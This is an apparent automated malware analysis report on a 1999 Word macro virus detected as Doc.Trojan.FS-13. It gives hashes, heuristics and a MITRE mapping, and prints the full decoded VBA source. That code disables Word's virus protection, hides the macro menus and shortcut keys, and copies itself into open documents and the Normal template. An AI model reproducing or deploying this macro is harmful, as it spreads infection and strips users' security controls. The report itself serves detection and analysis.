Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 cace05b028129453…

MALICIOUS

Office (OLE)

Size: 27.5 KB
Created: 1999-08-04 07:44:00
Authoring application: Microsoft Word 9.0
First seen: 2012-06-14
MD5: de59f3b92db60e8415977949239674ef
SHA-1: 09397bbb8d0bd0de1f895c08b8b25b867b8e7b48
SHA-256: cace05b0281294532b405e4b810f9bd0f565eb01317d73f017d7cafa6280c5ab
Risk Score: 80

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic

The sample is a Microsoft Word document containing VBA macros. The macro code attempts to disable macro security warnings and export its own code to a file named .SHS in the application directory. This behavior suggests an attempt to establish persistence or facilitate the execution of additional malicious code.

Heuristics (2)

  • ClamAV: Doc.Trojan.FS-13 (severity: critical, rule: CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Trojan.FS-13
  • VBA macros detected (severity: medium, rule: OLE_VBA_MACROS)
    Document contains VBA macro code

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 1273 bytes
SHA-256: 14a0146ca7b9cba575719610e487f40ba788e55d105e19a3d1cb2028966edaa1
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "Fancy"
'Copyright (C) 1998 by FlyShadow ~^^~ - Fancy
Sub DocClose(): Const ι = "Fancy"
On Error Resume Next
Options.VirusProtection = &H0
Options.SaveNormalPrompt = &H0
Options.ConfirmConversions = &H0
Application.EnableCancelKey = &H0
If ActiveDocument.Path = "" Then GoTo 0
CommandBars("Tools").Controls(12).Visible = &H0
KeyBindings.Add KeyCode:=BuildKeyCode(wdKeyAlt, wdKeyF8), KeyCategory:=0, Command:=" "
KeyBindings.Add KeyCode:=BuildKeyCode(wdKeyAlt, wdKeyF11), KeyCategory:=0, Command:=" "
If Dir(Application.Path & ".SHS") = "" Then ThisDocument.VBProject.VBComponents(ι).Export Application.Path & ".SHS"
If ActiveDocument.VBProject.VBComponents(ι).Name <> ι Then ActiveDocument.VBProject.VBComponents.Import Application.Path & ".SHS"
If NormalTemplate.VBProject.VBComponents(ι).Name <> ι Then NormalTemplate.VBProject.VBComponents.Import Application.Path & ".SHS"
0 ActiveDocument.Close: End Sub
Sub FileClose(): DocClose: End Sub